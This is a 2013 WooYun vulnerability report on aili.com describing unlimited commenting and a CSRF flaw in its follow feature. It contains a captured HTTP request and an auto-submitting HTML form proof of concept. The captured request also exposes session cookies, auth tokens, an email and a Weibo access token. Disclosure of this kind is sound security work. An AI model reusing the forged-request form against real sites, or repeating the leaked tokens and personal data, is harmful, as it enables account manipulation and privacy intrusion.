当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-037678

漏洞标题:爱丽网两处缺陷(csrf等)

相关厂商:aili.com

漏洞作者: 小龙

提交时间:2013-10-25 10:56

修复时间:2013-12-09 10:56

公开时间:2013-12-09 10:56

漏洞类型:CSRF

危害等级:中

自评Rank:5

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2013-10-25: 细节已通知厂商并且等待厂商处理中
2013-10-25: 厂商已经确认,细节仅向厂商公开
2013-11-04: 细节向核心白帽子及相关领域专家公开
2013-11-14: 细节向普通白帽子公开
2013-11-24: 细节向实习白帽子公开
2013-12-09: 细节向公众公开

简要描述:

详细说明:

http://show.aili.com/index.php?m=content&c=goods&a=goodsShow&gid=5071273无限评论

1.gif


漏洞证明:

任意关注csrf
抓包数据:

POST /index.php?m=content&c=goods&a=addAttention HTTP/1.1
Host: show.aili.com
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:23.0) Gecko/20100101 Firefox/23.0
Accept: */*
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://show.aili.com/index.php?m=content&c=goods&a=myhome&uid=1
Content-Length: 10
Cookie: BAIDU_CLB_REFER=http%3A%2F%2Fwww.baidu.com%2Fs%3Fword%3Dailiwang%26tn%3D82013038_103_hao_pg%26ie%3Dutf-8; Hm_lvt_7042ea0b321a91ea599a6d16b48f9a6b=1379719929; Hm_lpvt_7042ea0b321a91ea599a6d16b48f9a6b=1379728848; mid=523cd976ad8b7; __utma=1.1351935822.1379727729.1379727729.1379727729.1; __utmc=1; __utmz=1.1379727729.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); auth=6a59cuoNNYMcu3DnYUrRqaGQduA5sSuqNRKdzHlrCbT0P4RPDhiBR9dyxV7jm7dzay8UvkYgQx9cPdauYeLErnvbIO%2BUe4%2FjBX52ru7%2FIDz95EDm7xKqQQSrFzj6Eh6LdRj0x1yzti69FpWWGgFjl0Sk%2Blg3WJsfQduSpGqlkddQMCk; username=%26%2350%3B%26%2353%3B%26%2355%3B%26%2352%3B%26%2352%3B%26%2353%3B%26%2353%3B%26%2357%3B%26%2353%3B%26%2357%3B; asffd=2574455959; uid=1061171; avatar=http%3A%2F%2Fspace.aili.com%2Fuc_server%2Favatar.php%3Fuid%3D1061171%26size%3Dmiddle%26r%3D81384; integration=0; reportnum=0; report=0; 1061171email=2574455959%40qq.com; 1061171storearcnum=0; 1061171storepicnum=0; history=22648%2C22647%2C22643%2C23595%2C23593; __utmb=1.24.10.1379727729; lzstat_uv=11399191941278091788|2769764; lzstat_ss=2861658854_2_1379752035_2769764; CNZZDATA30020763=cnzz_eid%3D411560464-1379719844-http%253A%252F%252Fshow.aili.com%26ntime%3D1379725249%26cnzz_a%3D54%26retime%3D1379728847484%26sin%3Dnone%26ltime%3D1379728847484%26rtime%3D0; CNZZDATA30059587=cnzz_eid%3D1936712058-1379724330-http%253A%252F%252Fshow.aili.com%26ntime%3D1379724330%26cnzz_a%3D54%26retime%3D1379728847492%26sin%3Dnone%26ltime%3D1379728847492%26rtime%3D0; timestamp=1379728339000; sign=5A51DA1B4CFFB18EFB6359A40696A9C5; PHPSESSID=78e1e595675282700f619b886eadb47f; bArEe__realname=4f74AwkGAglSBgQEVFIBCgBQBQFQBwdeCgZaDgmEg5yE0urVpLg; weibojs_3917973109=access_token%3D2.00eWNuJEfm6JRE135af771150juxvz%26remind_in%3D666250%26expires_in%3D666250%26uid%3D3810916716; bArEe_auth=704bBFFRBQAJAAkDBFVXAFcGXAVcVghSCwFXXAFSAwQHcApiMjRZem5xVWp%2BZlQhKnU0W3N2cCthMENAWiRyUyBwCnEgNmN2a3NOahs; bArEe__userid=704bBFFRBQAJAAkDBFdSBlMBVVoOAAZWVlVWDQBdCwRRC1Q; bArEe__username=704bBFFRBQAJAAkDBFFSU1YAAAcKBFJTUl0DWw4UAghcClUDWFgH; bArEe____uname=%26%23113%3B%26%2349%3B%26%2356%3B%26%2357%3B%26%2356%3B%26%2351%3B%26%2355%3B%26%2357%3B%26%2357%3B%26%2350%3B
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
touserid=1


构造poc:

<html>
<body>
<form id="csrf" name="csrf" action="http://show.aili.com/index.php?m=content&c=goods&a=addAttention" method="POST">
<input type="text" name="touserid" value="1" />
<input type="submit" value="submit">
</form>
<script>
   document.csrf.submit();
</script>
</body>
</html>

修复方案:

1:乌云知识库看下
2:加个验证码

版权声明:转载请注明来源 小龙@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:9

确认时间:2013-10-25 11:09

厂商回复:

感谢白帽,此洞必补,程序猿要加油,再不努力,就要打屁屁了

最新状态:

暂无